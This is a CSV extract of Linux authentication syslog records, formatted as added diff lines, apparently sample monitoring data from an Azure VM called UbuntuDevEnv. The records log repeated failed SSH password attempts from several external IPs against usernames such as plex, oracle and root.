+1012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:38,UbuntuDevEnv,2019-06-26 18:25:37,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 45082:11: Bye Bye [preauth],63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,45082,,
+1013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:38,UbuntuDevEnv,2019-06-26 18:25:37,auth,UbuntuDevEnv,info,Disconnected from invalid user rou 107.175.127.237 port 45082 [preauth],63625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rou,107.175.127.2,45082,,
+1014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:42,UbuntuDevEnv,2019-06-26 18:25:41,auth,UbuntuDevEnv,info,Invalid user plex from 157.230.190.1 port 41978,63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plex,157.230.190.1,41978,,
+1015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:42,UbuntuDevEnv,2019-06-26 18:25:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+1016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:42,UbuntuDevEnv,2019-06-26 18:25:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:44,UbuntuDevEnv,2019-06-26 18:25:44,auth,UbuntuDevEnv,info,Failed password for invalid user plex from 157.230.190.1 port 41978 ssh2,63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plex,157.230.190.1,41978,,
+1018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:44,UbuntuDevEnv,2019-06-26 18:25:44,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 41978:11: Bye Bye [preauth],63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,41978,,
+1019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:25:44,UbuntuDevEnv,2019-06-26 18:25:44,auth,UbuntuDevEnv,info,Disconnected from invalid user plex 157.230.190.1 port 41978 [preauth],63663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plex,157.230.190.1,41978,,
+1020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:10,UbuntuDevEnv,2019-06-26 18:27:09,auth,UbuntuDevEnv,info,Invalid user kc from 165.227.41.202 port 42846,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kc,165.227.41.2,42846,,
+1021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:10,UbuntuDevEnv,2019-06-26 18:27:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:10,UbuntuDevEnv,2019-06-26 18:27:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:11,UbuntuDevEnv,2019-06-26 18:27:11,auth,UbuntuDevEnv,info,Failed password for invalid user kc from 165.227.41.202 port 42846 ssh2,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kc,165.227.41.2,42846,,
+1024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:12,UbuntuDevEnv,2019-06-26 18:27:11,auth,UbuntuDevEnv,info,Disconnected from invalid user kc 165.227.41.202 port 42846 [preauth],63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kc,165.227.41.2,42846,,
+1025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:12,UbuntuDevEnv,2019-06-26 18:27:11,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 42846:11: Bye Bye [preauth],63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,42846,,
+1026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:23,UbuntuDevEnv,2019-06-26 18:27:22,auth,UbuntuDevEnv,info,Invalid user fq from 157.230.190.1 port 58548,64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fq,157.230.190.1,58548,,
+1027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:23,UbuntuDevEnv,2019-06-26 18:27:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+1028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:23,UbuntuDevEnv,2019-06-26 18:27:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:25,UbuntuDevEnv,2019-06-26 18:27:24,auth,UbuntuDevEnv,info,Failed password for invalid user fq from 157.230.190.1 port 58548 ssh2,64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fq,157.230.190.1,58548,,
+1030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:25,UbuntuDevEnv,2019-06-26 18:27:25,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 58548:11: Bye Bye [preauth],64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,58548,,
+1031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:25,UbuntuDevEnv,2019-06-26 18:27:25,auth,UbuntuDevEnv,info,Disconnected from invalid user fq 157.230.190.1 port 58548 [preauth],64015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fq,157.230.190.1,58548,,
+1032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:42,UbuntuDevEnv,2019-06-26 18:27:41,auth,UbuntuDevEnv,info,Invalid user student from 107.175.127.237 port 34038,64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,107.175.127.2,34038,,
+1033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:42,UbuntuDevEnv,2019-06-26 18:27:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+1034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:42,UbuntuDevEnv,2019-06-26 18:27:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:44,UbuntuDevEnv,2019-06-26 18:27:43,auth,UbuntuDevEnv,info,Failed password for invalid user student from 107.175.127.237 port 34038 ssh2,64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,107.175.127.2,34038,,
+1036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:44,UbuntuDevEnv,2019-06-26 18:27:43,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 34038:11: Bye Bye [preauth],64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,34038,,
+1037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:27:44,UbuntuDevEnv,2019-06-26 18:27:43,auth,UbuntuDevEnv,info,Disconnected from invalid user student 107.175.127.237 port 34038 [preauth],64087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,107.175.127.2,34038,,
+1038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:28:58,UbuntuDevEnv,2019-06-26 18:28:57,auth,UbuntuDevEnv,info,Invalid user ts3 from 165.227.41.202 port 33678,64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,165.227.41.2,33678,,
+1039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:28:58,UbuntuDevEnv,2019-06-26 18:28:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:28:58,UbuntuDevEnv,2019-06-26 18:28:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:00,UbuntuDevEnv,2019-06-26 18:28:59,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 165.227.41.202 port 33678 ssh2,64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,165.227.41.2,33678,,
+1042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:00,UbuntuDevEnv,2019-06-26 18:28:59,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 33678:11: Bye Bye [preauth],64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,33678,,
+1043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:00,UbuntuDevEnv,2019-06-26 18:28:59,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 165.227.41.202 port 33678 [preauth],64345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,165.227.41.2,33678,,
+1044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:11,UbuntuDevEnv,2019-06-26 18:29:10,auth,UbuntuDevEnv,info,Invalid user default from 157.230.190.1 port 46902,64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,157.230.190.1,46902,,
+1045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:11,UbuntuDevEnv,2019-06-26 18:29:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:11,UbuntuDevEnv,2019-06-26 18:29:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+1047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:13,UbuntuDevEnv,2019-06-26 18:29:12,auth,UbuntuDevEnv,info,Failed password for invalid user default from 157.230.190.1 port 46902 ssh2,64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,157.230.190.1,46902,,
+1048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:13,UbuntuDevEnv,2019-06-26 18:29:12,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 46902:11: Bye Bye [preauth],64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,46902,,
+1049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:13,UbuntuDevEnv,2019-06-26 18:29:12,auth,UbuntuDevEnv,info,Disconnected from invalid user default 157.230.190.1 port 46902 [preauth],64397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,157.230.190.1,46902,,
+1050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:13,UbuntuDevEnv,2019-06-26 18:29:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.230.244  user=root,64412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,164.132.230.2,,0,
+1051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:15,UbuntuDevEnv,2019-06-26 18:29:15,auth,UbuntuDevEnv,info,Failed password for root from 164.132.230.244 port 42032 ssh2,64412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.230.2,42032,,
+1052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:15,UbuntuDevEnv,2019-06-26 18:29:15,auth,UbuntuDevEnv,info,"Received disconnect from 164.132.230.244 port 42032:11: Normal Shutdown, Thank you for playing [preauth]",64412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.230.2,42032,,
+1053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:15,UbuntuDevEnv,2019-06-26 18:29:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 164.132.230.244 port 42032 [preauth],64412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,164.132.230.2,42032,,
+1054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:29:58,UbuntuDevEnv,2019-06-26 18:29:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237  user=root,64562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,107.175.127.2,,0,
+1055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:00,UbuntuDevEnv,2019-06-26 18:29:59,auth,UbuntuDevEnv,info,Failed password for root from 107.175.127.237 port 51222 ssh2,64562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,51222,,
+1056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:00,UbuntuDevEnv,2019-06-26 18:30:00,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 51222:11: Bye Bye [preauth],64562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,51222,,
+1057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:00,UbuntuDevEnv,2019-06-26 18:30:00,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 107.175.127.237 port 51222 [preauth],64562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,107.175.127.2,51222,,
+1058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:44,UbuntuDevEnv,2019-06-26 18:30:44,auth,UbuntuDevEnv,info,Invalid user lturpin from 165.227.41.202 port 52726,64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lturpin,165.227.41.2,52726,,
+1059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:44,UbuntuDevEnv,2019-06-26 18:30:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:44,UbuntuDevEnv,2019-06-26 18:30:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+1061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:46,UbuntuDevEnv,2019-06-26 18:30:46,auth,UbuntuDevEnv,info,Failed password for invalid user lturpin from 165.227.41.202 port 52726 ssh2,64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lturpin,165.227.41.2,52726,,
+1062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:46,UbuntuDevEnv,2019-06-26 18:30:46,auth,UbuntuDevEnv,info,Disconnected from invalid user lturpin 165.227.41.202 port 52726 [preauth],64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lturpin,165.227.41.2,52726,,
+1063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:30:46,UbuntuDevEnv,2019-06-26 18:30:46,auth,UbuntuDevEnv,info,Received disconnect from 165.227.41.202 port 52726:11: Bye Bye [preauth],64815,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.41.2,52726,,
+1064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:35,UbuntuDevEnv,2019-06-26 18:31:35,auth,UbuntuDevEnv,info,Invalid user oracle from 174.138.56.93 port 53652,64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,174.138.56.9,53652,,
+1065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:35,UbuntuDevEnv,2019-06-26 18:31:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=174.138.56.93,64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,174.138.56.9,,0,
+1066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:35,UbuntuDevEnv,2019-06-26 18:31:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:38,UbuntuDevEnv,2019-06-26 18:31:37,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 174.138.56.93 port 53652 ssh2,64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,174.138.56.9,53652,,
+1068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:38,UbuntuDevEnv,2019-06-26 18:31:37,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 174.138.56.93 port 53652 [preauth],64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,174.138.56.9,53652,,
+1069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:31:38,UbuntuDevEnv,2019-06-26 18:31:37,auth,UbuntuDevEnv,info,"Received disconnect from 174.138.56.93 port 53652:11: Normal Shutdown, Thank you for playing [preauth]",64999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,174.138.56.9,53652,,
+1070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:12,UbuntuDevEnv,2019-06-26 18:32:12,auth,UbuntuDevEnv,info,Invalid user novell from 107.175.127.237 port 40174,65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,novell,107.175.127.2,40174,,
+1071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:32:12,UbuntuDevEnv,2019-06-26 18:32:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
